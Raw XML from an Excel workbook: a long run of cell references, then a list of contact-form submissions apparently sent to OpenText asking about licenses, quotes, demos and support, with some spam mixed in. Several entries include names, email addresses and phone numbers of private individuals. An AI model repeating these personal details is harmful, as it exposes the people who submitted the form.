  <c r="F10413" i="1"/>
  <c r="F10412" i="1"/>
  <c r="F10411" i="1"/>
  <c r="F10410" i="1"/>
  <c r="F10409" i="1"/>
  <c r="F10408" i="1"/>
  <c r="F10407" i="1"/>
  <c r="F10406" i="1"/>
  <c r="F10405" i="1"/>
  <c r="F10404" i="1"/>
  <c r="F10403" i="1"/>
  <c r="F10402" i="1"/>
  <c r="F10401" i="1"/>
  <c r="F10400" i="1"/>
  <c r="F10399" i="1"/>
  <c r="F10398" i="1"/>
  <c r="F10397" i="1"/>
  <c r="F10396" i="1"/>
  <c r="F10395" i="1"/>
  <c r="F10394" i="1"/>
  <c r="F10393" i="1"/>
  <c r="F10392" i="1"/>
  <c r="F10391" i="1"/>
  <c r="F10390" i="1"/>
  <c r="F10389" i="1"/>
  <c r="F10388" i="1"/>
  <c r="F10387" i="1"/>
  <c r="F10386" i="1"/>
  <c r="F10385" i="1"/>
  <c r="F10384" i="1"/>
  <c r="F10383" i="1"/>
  <c r="F10382" i="1"/>
  <c r="F10381" i="1"/>
  <c r="F10380" i="1"/>
  <c r="F10379" i="1"/>
  <c r="F10378" i="1"/>
  <c r="F10377" i="1"/>
  <c r="F10376" i="1"/>
  <c r="F10375" i="1"/>
  <c r="F10374" i="1"/>
  <c r="F10373" i="1"/>
  <c r="F10372" i="1"/>
  <c r="F10371" i="1"/>
  <c r="F10370" i="1"/>
  <c r="F10369" i="1"/>
  <c r="F10368" i="1"/>
  <c r="F10367" i="1"/>
  <c r="F10366" i="1"/>
  <c r="F10365" i="1"/>
  <c r="F10364" i="1"/>
  <c r="F10363" i="1"/>
  <c r="F10362" i="1"/>
  <c r="F10361" i="1"/>
  <c r="F10360" i="1"/>
  <c r="F10359" i="1"/>
  <c r="F10358" i="1"/>
  <c r="F10357" i="1"/>
  <c r="F10356" i="1"/>
  <c r="F10355" i="1"/>
  <c r="F10354" i="1"/>
  <c r="F10353" i="1"/>
  <c r="F10352" i="1"/>
  <c r="F10351" i="1"/>
  <c r="F10350" i="1"/>
  <c r="F10349" i="1"/>
  <c r="F10348" i="1"/>
  <c r="F10347" i="1"/>
  <c r="F10346" i="1"/>
  <c r="F10345" i="1"/>
  <c r="F10344" i="1"/>
  <c r="F10343" i="1"/>
  <c r="F10342" i="1"/>
  <c r="F10341" i="1"/>
  <c r="F10340" i="1"/>
  <c r="F10339" i="1"/>
  <c r="F10338" i="1"/>
  <c r="F10337" i="1"/>
  <c r="F10336" i="1"/>
  <c r="F10335" i="1"/>
  <c r="F10334" i="1"/>
  <c r="F10333" i="1"/>
  <c r="F10332" i="1"/>
  <c r="F10331" i="1"/>
  <c r="F10330" i="1"/>
  <c r="F10329" i="1"/>
  <c r="F10328" i="1"/>
  <c r="F10327" i="1"/>
  <c r="F10326" i="1"/>
  <c r="F10325" i="1"/>
  <c r="F10324" i="1"/>
  <c r="F10323" i="1"/>
  <c r="F10322" i="1"/>
  <c r="F10321" i="1"/>
  <c r="F10320" i="1"/>
  <c r="F10319" i="1"/>
  <c r="F10318" i="1"/>
  <c r="F10317" i="1"/>
  <c r="F10316" i="1"/>
  <c r="F10315" i="1"/>
  <c r="F10314" i="1"/>
  <c r="F10313" i="1"/>
  <c r="F10312" i="1"/>
  <c r="F10311" i="1"/>
  <c r="F10310" i="1"/>
  <c r="F10309" i="1"/>
  <c r="F10308" i="1"/>
  <c r="F10307" i="1"/>
  <c r="F10306" i="1"/>
  <c r="F10305" i="1"/>
  <c r="F10304" i="1"/>
  <c r="F10303" i="1"/>
  <c r="F10302" i="1"/>
  <c r="F10301" i="1"/>
  <c r="F10300" i="1"/>
  <c r="F10299" i="1"/>
  <c r="F10298" i="1"/>
  <c r="F10297" i="1"/>
  <c r="F10296" i="1"/>
  <c r="F10295" i="1"/>
  <c r="F10294" i="1"/>
  <c r="F10293" i="1"/>
  <c r="F10292" i="1"/>
  <c r="F10291" i="1"/>
  <c r="F10290" i="1"/>
  <c r="F10289" i="1"/>
  <c r="F10288" i="1"/>
  <c r="F10287" i="1"/>
  <c r="F10286" i="1"/>
  <c r="F10285" i="1"/>
  <c r="F10284" i="1"/>
  <c r="F10283" i="1"/>
  <c r="F10282" i="1"/>
  <c r="F10281" i="1"/>
  <c r="F10280" i="1"/>
  <c r="F10279" i="1"/>
  <c r="F10278" i="1"/>
  <c r="F10277" i="1"/>
  <c r="F10276" i="1"/>
  <c r="F10275" i="1"/>
  <c r="F10274" i="1"/>
  <c r="F10273" i="1"/>
  <c r="F10272" i="1"/>
  <c r="F10271" i="1"/>
  <c r="F10270" i="1"/>
  <c r="F10269" i="1"/>
  <c r="F10268" i="1"/>
  <c r="F10267" i="1"/>
  <c r="F10266" i="1"/>
  <c r="F10265" i="1"/>
  <c r="F10264" i="1"/>
  <c r="F10263" i="1"/>
  <c r="F10262" i="1"/>
  <c r="F10261" i="1"/>
  <c r="F10260" i="1"/>
  <c r="F10259" i="1"/>
  <c r="F10258" i="1"/>
  <c r="F10257" i="1"/>
  <c r="F10256" i="1"/>
  <c r="F10255" i="1"/>
  <c r="F10254" i="1"/>
  <c r="F10253" i="1"/>
  <c r="F10252" i="1"/>
  <c r="F10251" i="1"/>
  <c r="F10250" i="1"/>
  <c r="F10249" i="1"/>
  <c r="F10248" i="1"/>
  <c r="F10247" i="1"/>
  <c r="F10246" i="1"/>
  <c r="F10245" i="1"/>
  <c r="F10244" i="1"/>
  <c r="F10243" i="1"/>
  <c r="F10242" i="1"/>
  <c r="F10241" i="1"/>
  <c r="F10240" i="1"/>
  <c r="F10239" i="1"/>
  <c r="F10238" i="1"/>
  <c r="F10237" i="1"/>
  <c r="F10236" i="1"/>
  <c r="F10235" i="1"/>
  <c r="F10234" i="1"/>
  <c r="F10233" i="1"/>
  <c r="F10232" i="1"/>
  <c r="F10231" i="1"/>
  <c r="F10230" i="1"/>
  <c r="F10229" i="1"/>
  <c r="F10228" i="1"/>
  <c r="F10227" i="1"/>
  <c r="F10226" i="1"/>
  <c r="F10225" i="1"/>
  <c r="F10224" i="1"/>
  <c r="F10223" i="1"/>
  <c r="F10222" i="1"/>
  <c r="F10221" i="1"/>
  <c r="F10220" i="1"/>
  <c r="F10219" i="1"/>
  <c r="F10218" i="1"/>
  <c r="F10217" i="1"/>
  <c r="F10216" i="1"/>
  <c r="F10215" i="1"/>
  <c r="F10214" i="1"/>
  <c r="F10213" i="1"/>
  <c r="F10212" i="1"/>
  <c r="F10211" i="1"/>
  <c r="F10210" i="1"/>
  <c r="F10209" i="1"/>
  <c r="F10208" i="1"/>
  <c r="F10207" i="1"/>
  <c r="F10206" i="1"/>
  <c r="F10205" i="1"/>
  <c r="F10204" i="1"/>
  <c r="F10203" i="1"/>
  <c r="F10202" i="1"/>
  <c r="F10201" i="1"/>
  <c r="F10200" i="1"/>
  <c r="F10199" i="1"/>
  <c r="F10198" i="1"/>
  <c r="F10197" i="1"/>
  <c r="F10196" i="1"/>
  <c r="F10195" i="1"/>
  <c r="F10194" i="1"/>
  <c r="F10193" i="1"/>
  <c r="F10192" i="1"/>
  <c r="F10191" i="1"/>
  <c r="F10190" i="1"/>
  <c r="F10189" i="1"/>
  <c r="F10188" i="1"/>
  <c r="F10187" i="1"/>
  <c r="F10186" i="1"/>
  <c r="F10185" i="1"/>
  <c r="F10184" i="1"/>
  <c r="F10183"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8" i="1"/>
  <c r="F10157" i="1"/>
  <c r="F10156" i="1"/>
  <c r="F10155" i="1"/>
  <c r="F10154" i="1"/>
  <c r="F10153" i="1"/>
  <c r="F10152" i="1"/>
  <c r="F10151" i="1"/>
  <c r="F10150" i="1"/>
  <c r="F10149" i="1"/>
  <c r="F10148" i="1"/>
  <c r="F10147" i="1"/>
  <c r="F10146" i="1"/>
  <c r="F10145" i="1"/>
  <c r="F10144" i="1"/>
  <c r="F10143" i="1"/>
  <c r="F10142" i="1"/>
  <c r="F10141" i="1"/>
  <c r="F10140" i="1"/>
  <c r="F10139" i="1"/>
  <c r="F10138" i="1"/>
  <c r="F10137" i="1"/>
  <c r="F10136" i="1"/>
  <c r="F10135" i="1"/>
  <c r="F10134" i="1"/>
  <c r="F10133" i="1"/>
  <c r="F10132" i="1"/>
  <c r="F10131" i="1"/>
  <c r="F10130" i="1"/>
  <c r="F10129" i="1"/>
  <c r="F10128" i="1"/>
  <c r="F10127" i="1"/>
  <c r="F10126" i="1"/>
  <c r="F10125" i="1"/>
  <c r="F10124" i="1"/>
  <c r="F10123" i="1"/>
  <c r="F10122" i="1"/>
  <c r="F10121" i="1"/>
  <c r="F10120" i="1"/>
  <c r="F10119" i="1"/>
  <c r="F10118" i="1"/>
  <c r="F10117" i="1"/>
  <c r="F10116" i="1"/>
  <c r="F10115" i="1"/>
  <c r="F10114" i="1"/>
  <c r="F10113" i="1"/>
  <c r="F10112" i="1"/>
  <c r="F10111" i="1"/>
  <c r="F10110" i="1"/>
  <c r="F10109" i="1"/>
  <c r="F10108" i="1"/>
  <c r="F10107" i="1"/>
  <c r="F10106" i="1"/>
  <c r="F10105" i="1"/>
  <c r="F10104" i="1"/>
  <c r="F10103" i="1"/>
  <c r="F10102" i="1"/>
  <c r="F10101" i="1"/>
  <c r="F10100" i="1"/>
  <c r="F10099" i="1"/>
  <c r="F10098" i="1"/>
  <c r="F10097" i="1"/>
  <c r="F10096" i="1"/>
  <c r="F10095" i="1"/>
  <c r="F10094" i="1"/>
  <c r="F10093" i="1"/>
  <c r="F10092" i="1"/>
  <c r="F10091" i="1"/>
  <c r="F10090" i="1"/>
  <c r="F10089" i="1"/>
  <c r="F10088" i="1"/>
  <c r="F10087" i="1"/>
  <c r="F10086" i="1"/>
  <c r="F10085" i="1"/>
  <c r="F10084" i="1"/>
  <c r="F10083" i="1"/>
  <c r="F10082" i="1"/>
  <c r="F10081" i="1"/>
  <c r="F10080" i="1"/>
  <c r="F10079" i="1"/>
  <c r="F10078" i="1"/>
  <c r="F10077" i="1"/>
  <c r="F10076" i="1"/>
  <c r="F10075" i="1"/>
  <c r="F10074" i="1"/>
  <c r="F10073" i="1"/>
  <c r="F10072" i="1"/>
  <c r="F10071" i="1"/>
  <c r="F10070" i="1"/>
  <c r="F10069" i="1"/>
  <c r="F10068" i="1"/>
  <c r="F10067" i="1"/>
  <c r="F10066" i="1"/>
  <c r="F10065" i="1"/>
  <c r="F10064" i="1"/>
  <c r="F10063" i="1"/>
  <c r="F10062" i="1"/>
  <c r="F10061" i="1"/>
  <c r="F10060" i="1"/>
  <c r="F10059" i="1"/>
  <c r="F10058" i="1"/>
  <c r="F10057" i="1"/>
  <c r="F10056" i="1"/>
  <c r="F10055" i="1"/>
  <c r="F10054" i="1"/>
  <c r="F10053" i="1"/>
  <c r="F10052" i="1"/>
  <c r="F10051" i="1"/>
  <c r="F10050" i="1"/>
  <c r="F10049" i="1"/>
  <c r="F10048" i="1"/>
  <c r="F10047" i="1"/>
  <c r="F10046" i="1"/>
  <c r="F10045" i="1"/>
  <c r="F10044" i="1"/>
  <c r="F10043" i="1"/>
  <c r="F10042" i="1"/>
  <c r="F10041" i="1"/>
  <c r="F10040" i="1"/>
  <c r="F10039" i="1"/>
  <c r="F10038" i="1"/>
  <c r="F10037" i="1"/>
  <c r="F10036" i="1"/>
  <c r="F10035" i="1"/>
  <c r="F10034" i="1"/>
  <c r="F10033" i="1"/>
  <c r="F10032" i="1"/>
  <c r="F10031" i="1"/>
  <c r="F10030" i="1"/>
  <c r="F10029" i="1"/>
  <c r="F10028" i="1"/>
  <c r="F10027" i="1"/>
  <c r="F10026" i="1"/>
  <c r="F10025" i="1"/>
  <c r="F10024" i="1"/>
  <c r="F10023" i="1"/>
  <c r="F10022" i="1"/>
  <c r="F10021" i="1"/>
  <c r="F10020" i="1"/>
  <c r="F10019" i="1"/>
  <c r="F10018" i="1"/>
  <c r="F10017" i="1"/>
  <c r="F10016" i="1"/>
  <c r="F10015" i="1"/>
  <c r="F10014" i="1"/>
  <c r="F10013" i="1"/>
  <c r="F10012" i="1"/>
  <c r="F10011" i="1"/>
  <c r="F10010" i="1"/>
  <c r="F10009" i="1"/>
  <c r="F10008" i="1"/>
  <c r="F10007" i="1"/>
  <c r="F10006" i="1"/>
  <c r="F10005" i="1"/>
  <c r="F10004" i="1"/>
  <c r="F10003" i="1"/>
  <c r="F10002" i="1"/>
  <c r="F10001"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alcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="82158" uniqueCount="27463">
  <si>
    <t>Date Submitted</t>
  </si>
  <si>
    <t>Inquiry Type</t>
  </si>
  <si>
    <t>Country</t>
  </si>
  <si>
    <t>State or Province</t>
  </si>
  <si>
    <t>Reason for Contact</t>
  </si>
  <si>
    <t>General Inquiries</t>
  </si>
  <si>
    <t>CA</t>
  </si>
  <si>
    <t>NB</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
The Province of New Brunswick, Office of the Attorney General, Legal Services Branch is currently looking for data management software for litigation files to replace CaseLogistix.  Would it be possible to discuss products available to replace CaseLogistix?_x000D_
Kind regards,_x000D_
Maya</t>
  </si>
  <si>
    <t>Professional Services</t>
  </si>
  <si>
    <t>US</t>
  </si>
  <si>
    <t>AZ</t>
  </si>
  <si>
    <t>I am need of a document solution for two CRMs we have: SFDC Service &amp; Oracle OEC. Our team processes/combines about 14K docs/pdfs a year. We have about 55 agents that would need licenses. Does your solution work for both CRMs?</t>
  </si>
  <si>
    <t>Sales</t>
  </si>
  <si>
    <t>TN</t>
  </si>
  <si>
    <t>Hello,_x000D_
Can you please provide me with a written quote for 15 licenses of AutoCad only single seat licenses of Brava Viewer?_x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>BR</t>
  </si>
  <si>
    <t>IL</t>
  </si>
  <si>
    <t>I'm trying to verify employment of Jennifer Wemstrom</t>
  </si>
  <si>
    <t>Customer Support</t>
  </si>
  <si>
    <t>NJ</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to download a trial / limited connections / limited users version of FirstClass Server 16.1 -- preferably Build 3516, if possible.  </t>
  </si>
  <si>
    <t>Learning Services</t>
  </si>
  <si>
    <t>MD</t>
  </si>
  <si>
    <t>Testing the form</t>
  </si>
  <si>
    <t>ON</t>
  </si>
  <si>
    <t>heeelp!</t>
  </si>
  <si>
    <t>test123</t>
  </si>
  <si>
    <t>Testing form</t>
  </si>
  <si>
    <t>AF</t>
  </si>
  <si>
    <t>Testing 123456</t>
  </si>
  <si>
    <t>testing form</t>
  </si>
  <si>
    <t>test</t>
  </si>
  <si>
    <t>IA</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
 I am actually looking for replacement to Microsoft Word, Excel and PowerPoint Viewers. I am trying to understand  if OpenText Brava will fit in our ecosystem for this specific purpose.  _x000D_
Best regards,_x000D_
Mohibul Hoque_x000D_
5635895660_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Partners</t>
  </si>
  <si>
    <t>NY</t>
  </si>
  <si>
    <t>We are interested in integrating with OpenText's EasyLink product. A mutual partner is using your platform to manage its Suppliers and invoices._x000D_
_x000D_
Is there someone I can speak with to get additional information?</t>
  </si>
  <si>
    <t>To OpenText,_x000D_
_x000D_
I am the Tech PM for a project called Records Management here at Panda Restaurant Group.  We are implementing this project using OpenText CS16 RM.  This project includes records collected from internal storage and Exchange Online (Office365).  Our OpenText Implementation Partner is RiseTime.   _x000D_
_x000D_
I do need access to the followings:_x000D_
_x000D_
Admin and User Guides for OpenText CS 16 R2_x000D_
Admin and User Guides for Exchange Online interface_x000D_
OpenText CS16 R2 Architecture and Integration papers_x000D_
OpenText CS16 R2 Performance Specs_x000D_
_x000D_
If you have any questions please feel free to reach out to me at ted.nguyen@PandaRG.com</t>
  </si>
  <si>
    <t>SC</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there,_x000D_
_x000D_
I'm working on an ai demo for magellan and I was wondering where this contact-us form goes. Can someone reach out to me?_x000D_
_x000D_
thanks,_x000D_
Will_x000D_
</t>
  </si>
  <si>
    <t>IN</t>
  </si>
  <si>
    <t>Our Customer ID is 10003704. Can you please provide us your Lionbridge Contact Name for this customer ID. Also can you please confirm that where are you sending invoice copies which are billing to us. _x000D_
_x000D_
Thank you._x000D_
Atul Maladkar</t>
  </si>
  <si>
    <t>ES</t>
  </si>
  <si>
    <t xml:space="preserve">Hello_x000D_
We have a problem with the rightfax express server_x000D_
CAn you help us?_x000D_
santos@cartv.es_x000D_
34669691174_x000D_
Best REgards_x000D_
</t>
  </si>
  <si>
    <t>MU</t>
  </si>
  <si>
    <t>WA</t>
  </si>
  <si>
    <t>We offer you the opportunity to advertise your products and services. _x000D_
 _x000D_
Good man! Look at an amazing offering for you. I can help you with sending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April 7.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Sorry to bother you. _x000D_
 _x000D_
This message is created automatically use our contacts for communication.</t>
  </si>
  <si>
    <t>GB</t>
  </si>
  <si>
    <t>I would like to explore the possibility of a 2 day training course / consultancy in Administration / Installation of OpenText Communications Center Enterprise (CCE) (formerly OpenText StreamServe) including the install and administration of supporting components such as OTDS and creating tenants.</t>
  </si>
  <si>
    <t>SE</t>
  </si>
  <si>
    <t>Hej_x000D_
Vi använder oss idag av StreamServe för våra brevutskick till kunder._x000D_
Inom kort skulle vi vilja börja skicka ut brev med QR koder._x000D_
_x000D_
Är det möjligt med dagens lösning vi har?_x000D_
Vad skulle annars krävas?_x000D_
_x000D_
Invärdet kommer vara en textsträng 45 tecken som vi vill ha omgjord till en QR kod i storlek 2,5 * 2,5 centimeter. _x000D_
Är det möjligt att få den i vald färg?_x000D_
_x000D_
Mvh_x000D_
Tommy Ax_x000D_
Telenor Sverige AB</t>
  </si>
  <si>
    <t>FL</t>
  </si>
  <si>
    <t>would like to have a demo of OpenText poducts for cotent management, probably Content Suite and would like to undertand the differences from Documentum.</t>
  </si>
  <si>
    <t>OT learning courses and their cost for India Location</t>
  </si>
  <si>
    <t xml:space="preserve">Hi There,_x000D_
We are interested to get pricing model of BIRT business intelligence tool._x000D_
Please could you get back to me for further discussion and quotation._x000D_
_x000D_
Many Thanks_x000D_
Raja_x000D_
00447713281851_x000D_
 </t>
  </si>
  <si>
    <t>DC</t>
  </si>
  <si>
    <t>Hi, can you help me out with a quote to purchase 2 x Tableau T8u USB3.0 write blockers. I'm struggling to find any prices through the OpenText/Guidance web site?_x000D_
_x000D_
Are all Tableau's now sold through third parties? If so, could you refer me to a reseller in the UK._x000D_
_x000D_
Thanks _x000D_
_x000D_
Richard Blomley</t>
  </si>
  <si>
    <t xml:space="preserve">First page rankings on Google_x000D_
_x000D_
We can put your website on 1st page of Google to drive relevant traffic to your site. Let us know if you would be interested in getting detailed proposal. We can also schedule a call &amp; will be pleased to explain our services in detail. We look forward to hearing from you soon. Thanks!_x000D_
</t>
  </si>
  <si>
    <t>Please can you let me know when my EnCE Certification is due for renewal.</t>
  </si>
  <si>
    <t>ZA</t>
  </si>
  <si>
    <t xml:space="preserve">hi there,_x000D_
_x000D_
we are currently designing statements on Extreme V16.4.5i need to map a total variable but fails on incorrect value placed. in the data file i receive the variable as 95 875.00. now it complains about the space after the 95? is there a way for Extreme to allow this amount?_x000D_
_x000D_
regards_x000D_
daniel_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are authorised reseller for software tools in India.  One of our customer is in need of your software_x000D_
_x000D_
Open text image view – permanent software - Qty 1_x000D_
_x000D_
Request you to kindly share reseller discounted price at the earliest._x000D_
_x000D_
Regards,_x000D_
Priya_x000D_
Preflex Solutions Pvt Ltd</t>
  </si>
  <si>
    <t>EG</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
Could you please support to get quote for below LIC:_x000D_
RightFax SA Renewal for below configuration: SA start date: 31st Dec 2018 to 30th Dec 2023 Existing configuration: RF Business Server QTY1 FOIP Enabled Channels QTY1 FOIP Channels additional QTY11 RF PDF Module QTY1_x000D_
Best regards,_x000D_
Dalia Hosny </t>
  </si>
  <si>
    <t>FR</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour, _x000D_
Nous avons des procédures d'ouverture d'attractions gérées sur edocs._x000D_
Nous aimerions récupérer ces checklists sur une tablette afin de les compléter._x000D_
L'idée est de s'affranchir de l'édition papier._x000D_
Avez-vous certains de vos clients qui ont déjà fait ce type de démarche._x000D_
Si oui nous serions très intéresses. Idéalement s'il existe une solution intégrée à votre solution ce serait parfait. Si vous avez des solutions construites avec des partenaires nous serions aussi curieux de voir ce qui a été fait. Par avance merci. Igor Pettirossi.  </t>
  </si>
  <si>
    <t>SK</t>
  </si>
  <si>
    <t>Hi Support team for OpenText, _x000D_
_x000D_
I would ask you something more about OpenText Information Extraction Service for SAP® Solutions._x000D_
_x000D_
Our company wants to use this product only for testing, because we see potential in this innovative approach to capture information for future use in our business. We don´t want to buy a license, yet. _x000D_
Is it possible, please? _x000D_
_x000D_
Thank you in advance for your answer._x000D_
Best regards, _x000D_
Martina Remkova</t>
  </si>
  <si>
    <t>DK</t>
  </si>
  <si>
    <t>Dear Opentext_x000D_
What is the price for running a FirstClass-system on a HighSchool as an mail and conference system._x000D_
Best regards_x000D_
Claus Hartvig</t>
  </si>
  <si>
    <t>DE</t>
  </si>
  <si>
    <t>We want to create a cms using the opentext. Please suggest us.</t>
  </si>
  <si>
    <t>SG</t>
  </si>
  <si>
    <t>Hi. Our company is recently awarded a govt project to develop a solution for infrastructure inspection. I wish to find out more about your information management platform with the specific needs in the hosting of contents, managing the contents (including integrating with 3d visuals and AI engines, customizing workflows and sharing of contents with different users.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello and Good Day_x000D_
I am Max (Jitesh chauhan) Marketing Manager with a reputable online marketing company based in India._x000D_
We can fairly quickly promote your website to the top of the search rankings with no long term contracts!_x000D_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We would be happy to send you a proposal using the top search phrases for your area of expertise. Please contact me at your convenience so we can start saving you some money._x000D_
In order for us to respond to your request for information, please include your company’s website address (mandatory) and or phone number._x000D_
So let me know if you would like me to mail you more details or schedule a call. We'll be pleased to serve you._x000D_
I look forward to your mail._x000D_
Thanks and Regards_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello And Good Day_x000D_
_x000D_
I am Jitesh Chauhan,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t>
  </si>
  <si>
    <t>We would like to have OpenText exceed 14 x64 ServicePack 13 or later version.</t>
  </si>
  <si>
    <t>May I know how to download Brava Desktop IXL Perpetual license which I've purchased?</t>
  </si>
  <si>
    <t>Please ask my sales rep to contact me Thursday._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Michael</t>
  </si>
  <si>
    <t>VA</t>
  </si>
  <si>
    <t>I was interested to see if you have consultants who have strong metastorm backgrounds? We have an immediate need.</t>
  </si>
  <si>
    <t>PE</t>
  </si>
  <si>
    <t>Costo de migrar de Documentum 7, Webtop 6.7 a la última version._x000D_
Cost of migrating from Documentum 7, Webtop 6.7 to the latest version.</t>
  </si>
  <si>
    <t>Having an issue registering for Enterprise World. Error Message:_x000D_
TimeWed Apr 03 2019 13:25:41 GMT-0700 (US Mountain Standard Time)Instance ID48d3774d-d4dc-4ccb-8ca7-a21a990b944fPage Load ID1f3ac73f-c59b-444d-9eb1-03e33a81bfba</t>
  </si>
  <si>
    <t>Is there a new NSRL release for Encase 8.0.7?  If so, can you provide a link for download?</t>
  </si>
  <si>
    <t>NC</t>
  </si>
  <si>
    <t>I've heard rumors that you will not be supporting Alchemy after 2019. Please confirm</t>
  </si>
  <si>
    <t>Add My Support information_x000D_
company: bank of America_x000D_
EU0264233</t>
  </si>
  <si>
    <t>TX</t>
  </si>
  <si>
    <t xml:space="preserve">Hi OpenText - My company is a Best Buy vendor and we need to get setup with an EDI service to manage purchase orders, invoices, and payments with Best Buy (&lt;10 transactions per month).  They suggested we use EasyLink. Can you please suggest next steps for getting setup?_x000D_
 </t>
  </si>
  <si>
    <t>What to set up an mail box with GSX and starting the EDI set up from Aldi</t>
  </si>
  <si>
    <t>AL</t>
  </si>
  <si>
    <t>We offer you the opportunity to advertise your products and services. _x000D_
 _x000D_
Good man! Look at an interesting offer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Mailing is made in the same way as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April 7.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All the best _x000D_
 _x000D_
This message is created automatically use our contacts for communication.</t>
  </si>
  <si>
    <t>OR</t>
  </si>
  <si>
    <t>Need an Updated Renewal quote for :_x000D_
_x000D_
Host Explorer Single License (Electronic) Maintenance_x000D_
OpenText - Part#: 1000027595_x000D_
Contract Name: NASPO Software VAR_x000D_
Contract #: ADSPO16-130651_x000D_
Subcontract #: 6454_x000D_
Serial #: V0405-61000_x000D_
Coverage Term: 7/1/2019 – 6/30/2020</t>
  </si>
  <si>
    <t>Our agency is in the beginning phase of exploring ECM software to better assist us with managing our records.  I would like to receive product information and schedule a demo of your product to evaluate feasibility.</t>
  </si>
  <si>
    <t>NG</t>
  </si>
  <si>
    <t>I need to open bet9ja account and powered</t>
  </si>
  <si>
    <t>I would like my account to be upgraded to a Capgemini partner account, for access to the knowledge base.</t>
  </si>
  <si>
    <t>We're looking into options for sharing images with our various customers in a very simple, easy way.  We used to use MediaBin (which functioned with simple folders that had different permissions/logins set for each of them for each of our different customers), where we copied images into._x000D_
We're looking for something just as simplified now - we don't have the manpower to be uploading images and then having to spend extra time linking them, categorizing them, etc._x000D_
Do you have a solution that could help in this way?_x000D_
P.S. Email is the best way to reach me.  :)</t>
  </si>
  <si>
    <t>Hi, _x000D_
I came across your brochure regarding VIM product and as Menzies are looking at automating our Accounts Payable function, I would be keen to have an initial conversation regarding the solution you can offer. We are particularly interested in OCR and Making Tax Digital. We already use LiveLink for SAP scanning. I would also like to invite our PTP Finance Manager to the call, so please get in touch with available dates/times next week._x000D_
Regards,</t>
  </si>
  <si>
    <t>TL</t>
  </si>
  <si>
    <t>BE</t>
  </si>
  <si>
    <t>I like to have information on my current license for Gupta._x000D_
This is probably acquired by company COSMOS._x000D_
I'm currently known by my old email: erik.vanhouwenhuyse@cosmosworldwide.com</t>
  </si>
  <si>
    <t>I have tried to create an account however no confirmation email was sent to my email and I am not able to log in.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I am looking for a copy of my EnCase Certification number and expiration date. </t>
  </si>
  <si>
    <t>CO</t>
  </si>
  <si>
    <t xml:space="preserve">Need the best price for course 3-8010 Documentum Technical Fundamentals On Demand.  $4,475 is a stretch for Web based training.  Please help justify to help me get an approval for the cost. </t>
  </si>
  <si>
    <t>We offer you the opportunity to advertise your products and services. _x000D_
 _x000D_
Hello! Behold is  an amazing offer for you. I can send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April 7.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Hope to hear from you soon. _x000D_
 _x000D_
This message is created automatically use our contacts for communication.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
We are currently conducting a business case analysis for implementing a content management solution (CMS) for one of our clients.  The role of the CMS is to provide secure file hosting and transfer between development, test, and production environments. We are currently doing research on the cost and pricing models for on-prem CMS solutions.  We would like to better understand your pricing models, including acquisition costs and reoccurring costs.  We’d appreciate it if you could answer the following questions about your product:_x000D_
_x000D_
What is your pricing model for your product?_x000D_
Is there a flat fee for software or is it license-based?_x000D_
If license-based, how does the licensing work, is it based on number of users, storage, etc. _x000D_
If fixed fee, are there different tiers or levels feature levels that change the cost?_x000D_
What is the annual reoccurring cost for your product?  Is it percentage based?_x000D_
What are the infrastructure hosting requirements for your solution?_x000D_
How much compute, memory, and storage is needed?_x000D_
How does this change as the system scales and what are the thresholds for those changes?_x000D_
Are there any other associated costs or pricing considerations with your solution?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Interested in the text analytics offering and would like to have a demo and a preliminary quote.</t>
  </si>
  <si>
    <t>OH</t>
  </si>
  <si>
    <t>Hi,_x000D_
We want to see your B2B translation software solution.  How can we get a demo?  _x000D_
_x000D_
Thanks,_x000D_
Marty</t>
  </si>
  <si>
    <t>AB</t>
  </si>
  <si>
    <t>I am attempting to reset my password and I keep getting an error has occurred.</t>
  </si>
  <si>
    <t xml:space="preserve">MP Pierre Poilievre would like to request a meeting with Mr. Tom Jenkins, chair of the Board of OpenText. </t>
  </si>
  <si>
    <t>Have an existing dazel/HPOS implementation.  We seem to have an issue with our sft template.  When creating printers malformed characters are created and cause the printers to not function.  We were able to work around this issue : OTCS Ticket 4070672 : HPOS/Dazel  but would like to get a permanent solution in place.  Email is best for contact</t>
  </si>
  <si>
    <t>TH</t>
  </si>
  <si>
    <t xml:space="preserve">HOw can5000_x000D_
KASIKORNBANK.THAILAND​0513813651_x000D_
66825379744​_x000D_
</t>
  </si>
  <si>
    <t>Our enterprise (Unum) is implementing Open Text. I am a Product Owner with a project to introduce texting and customer communication preferences for our Claims business and would like to get a demo of the system.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
We currently distribute a piece of software called Docs Management or Docs Admin depending on which version it is. We believe it is supported by a company called Hummingbird and in order to contact them we need to raise a support ticket with you. _x000D_
_x000D_
Is there anyone I can speak with regarding this to gain some clarity on finding the software owners and in turn raising multiple issues we are facing with the program_x000D_
_x000D_
Thanks _x000D_
_x000D_
Reece </t>
  </si>
  <si>
    <t>Dear Sir,_x000D_
We are using Encase Forensics v7.10 . How Can i get updated version?_x000D_
Our license dongle id :- G2002076083.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear All,_x000D_
_x000D_
I need to know quick preview abut DocuSign and if your have a partner in Egypt to help us for support also what version will help me to approve E-Signature _x000D_
We need E-Signature for  our management but right now i don't know the number of Document per month    </t>
  </si>
  <si>
    <t>NL</t>
  </si>
  <si>
    <t>I am trying to access the download section of your website but I'm getting a 502 Server Error.</t>
  </si>
  <si>
    <t>We are looking at installing Document Control Software to better handle project and internal documentation.  Would you be able to give us a demonstration of the software and indicative pricing for us to evaluate?</t>
  </si>
  <si>
    <t>BY</t>
